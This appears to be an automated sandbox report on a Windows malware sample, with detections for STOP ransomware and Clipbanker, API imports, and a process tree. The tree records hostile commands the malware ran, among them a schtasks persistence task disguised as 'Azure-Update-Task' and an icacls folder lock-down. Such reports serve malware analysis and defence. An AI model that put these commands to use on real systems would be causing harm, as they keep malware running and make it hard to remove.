Source: Process Memory Space: E8B1.exe PID: 7356, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 759F.exe PID: 7412, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 6000.exe PID: 7420, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 759F.exe PID: 7448, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: C:\Users\user\AppData\Local\Temp\F86F.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: String function: 00410DF3 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Code function: String function: 0040E1B4 appears 65 times

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401558
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,	0_2_00401749
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401564
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401577
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401523
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401585
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040158C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040159A
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401558
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_00401749 NtMapViewOfSection,NtMapViewOfSection,	4_2_00401749
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401564
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401577
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401523
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401585
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040158C
Source: C:\Users\user\AppData\Roaming\rrjthgj	Code function: 4_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040159A

Source: E8B1.exe.1.dr	Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: AF5C.exe.1.dr	Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 9B15.exe.1.dr	Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 86ED.exe.1.dr	Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DF46.exe.1.dr	Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: E8B1.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 6000.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 759F.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 6C74.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C2B9.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AF5C.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 9B15.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 86ED.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 67F2.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DF46.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: E9C7.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: F09E.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 11.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rrjthgj.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wujthgj.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 759F.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rrjthgj

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@74/315@61/18

Source: C:\Windows\explorer.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\759F.exe

Code function: 5_2_00404F90 GetStringTypeExA,CreateFileMappingW,GetPolyFillMode,ReportEventW,ReadEventLogW,SetFilePointer,_fprintf,__vswprintf,GetComputerNameW,GetModuleFileNameW,GetVersionExW,GetComputerNameW,GetModuleFileNameW,GetVersionExW,GetConsoleAliasesW,GetDateFormatW,SetCaretPos,GetACP,GetTickCount,SetCaretPos,GetSysColorBrush,GetACP,GetTickCount,GetCurrentProcessId,MoveFileA,FormatMessageA,ReadConsoleA,GetCurrentProcessId,MoveFileA,FormatMessageA,ReadConsoleA,GetCompressedFileSizeA,FindFirstVolumeW,GetCurrentDirectoryA,SetCurrentDirectoryA,InterlockedDecrement,OpenSemaphoreA,LoadMenuW,CharToOemBuffA,CharUpperBuffA,LoadMenuW,CharToOemBuffA,CharUpperBuffA,GetLastError,GetLastError,WriteConsoleW,GetLastError,WriteConsoleW,GetWindowsDirectoryA,CreateMutexW,VirtualFree,ReplaceFileA,GetWindowsDirectoryA,CreateMutexW,VirtualFree,ReplaceFileA,

5_2_00404F90

Source: file.exe

Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rrjthgj C:\Users\user\AppData\Roaming\rrjthgj
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\759F.exe C:\Users\user\AppData\Local\Temp\759F.exe
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Process created: C:\Users\user\AppData\Local\Temp\759F.exe C:\Users\user\AppData\Local\Temp\759F.exe
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: unknown	Process created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe --Task
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6C74.exe C:\Users\user\AppData\Local\Temp\6C74.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process created: C:\Users\user\AppData\Local\Temp\6C74.exe C:\Users\user\AppData\Local\Temp\6C74.exe
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Process created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe --Task
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Process created: C:\Users\user\AppData\Local\Temp\759F.exe "C:\Users\user\AppData\Local\Temp\759F.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Process created: C:\Users\user\AppData\Local\Temp\759F.exe "C:\Users\user\AppData\Local\Temp\759F.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\consent.exe consent.exe 4776 442 0000022BAEE1B7D0
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C2B9.exe C:\Users\user\AppData\Local\Temp\C2B9.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\AF5C.exe C:\Users\user\AppData\Local\Temp\AF5C.exe
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process created: C:\Users\user\AppData\Local\Temp\6C74.exe "C:\Users\user\AppData\Local\Temp\6C74.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9B15.exe C:\Users\user\AppData\Local\Temp\9B15.exe
Source: C:\Users\user\AppData\Local\Temp\AF5C.exe	Process created: C:\Users\user\AppData\Local\Temp\AF5C.exe C:\Users\user\AppData\Local\Temp\AF5C.exe
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process created: C:\Users\user\AppData\Local\Temp\6C74.exe "C:\Users\user\AppData\Local\Temp\6C74.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\86ED.exe C:\Users\user\AppData\Local\Temp\86ED.exe
Source: C:\Users\user\AppData\Local\Temp\9B15.exe	Process created: C:\Users\user\AppData\Local\Temp\9B15.exe C:\Users\user\AppData\Local\Temp\9B15.exe
Source: C:\Users\user\AppData\Local\Temp\86ED.exe	Process created: C:\Users\user\AppData\Local\Temp\86ED.exe C:\Users\user\AppData\Local\Temp\86ED.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E8B1.exe C:\Users\user\AppData\Local\Temp\E8B1.exe
Source: C:\Users\user\AppData\Local\Temp\E8B1.exe	Process created: C:\Users\user\AppData\Local\Temp\E8B1.exe C:\Users\user\AppData\Local\Temp\E8B1.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6000.exe C:\Users\user\AppData\Local\Temp\6000.exe
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Process created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\6000.exe	Process created: C:\Users\user\AppData\Local\Temp\6000.exe C:\Users\user\AppData\Local\Temp\6000.exe
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process created: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe "C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process created: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe "C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe"
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Process created: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe "C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D5B9.exe C:\Users\user\AppData\Local\Temp\D5B9.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\759F.exe C:\Users\user\AppData\Local\Temp\759F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6C74.exe C:\Users\user\AppData\Local\Temp\6C74.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C2B9.exe C:\Users\user\AppData\Local\Temp\C2B9.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\AF5C.exe C:\Users\user\AppData\Local\Temp\AF5C.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9B15.exe C:\Users\user\AppData\Local\Temp\9B15.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\86ED.exe C:\Users\user\AppData\Local\Temp\86ED.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E8B1.exe C:\Users\user\AppData\Local\Temp\E8B1.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6000.exe C:\Users\user\AppData\Local\Temp\6000.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D5B9.exe C:\Users\user\AppData\Local\Temp\D5B9.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\consent.exe consent.exe 4776 442 0000022BAEE1B7D0	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Process created: C:\Users\user\AppData\Local\Temp\759F.exe C:\Users\user\AppData\Local\Temp\759F.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Process created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe --Task	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process created: C:\Users\user\AppData\Local\Temp\6C74.exe C:\Users\user\AppData\Local\Temp\6C74.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\759F.exe	Process created: C:\Users\user\AppData\Local\Temp\759F.exe "C:\Users\user\AppData\Local\Temp\759F.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\AF5C.exe	Process created: C:\Users\user\AppData\Local\Temp\AF5C.exe C:\Users\user\AppData\Local\Temp\AF5C.exe
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process created: C:\Users\user\AppData\Local\Temp\6C74.exe "C:\Users\user\AppData\Local\Temp\6C74.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\9B15.exe	Process created: C:\Users\user\AppData\Local\Temp\9B15.exe C:\Users\user\AppData\Local\Temp\9B15.exe
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process created: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe "C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	Process created: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe "C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe"
Source: C:\Users\user\AppData\Local\Temp\86ED.exe	Process created: C:\Users\user\AppData\Local\Temp\86ED.exe C:\Users\user\AppData\Local\Temp\86ED.exe
Source: C:\Users\user\AppData\Local\Temp\E8B1.exe	Process created: C:\Users\user\AppData\Local\Temp\E8B1.exe C:\Users\user\AppData\Local\Temp\E8B1.exe
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Process created: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\6000.exe	Process created: C:\Users\user\AppData\Local\Temp\6000.exe C:\Users\user\AppData\Local\Temp\6000.exe
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	Process created: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe "C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe"
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\759F.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\D5B9.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\rrjthgj

Code function: 4_2_01FE68FD CreateToolhelp32Snapshot,Module32First,

4_2_01FE68FD

Source: D5B9.exe.1.dr, Stub/Program.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
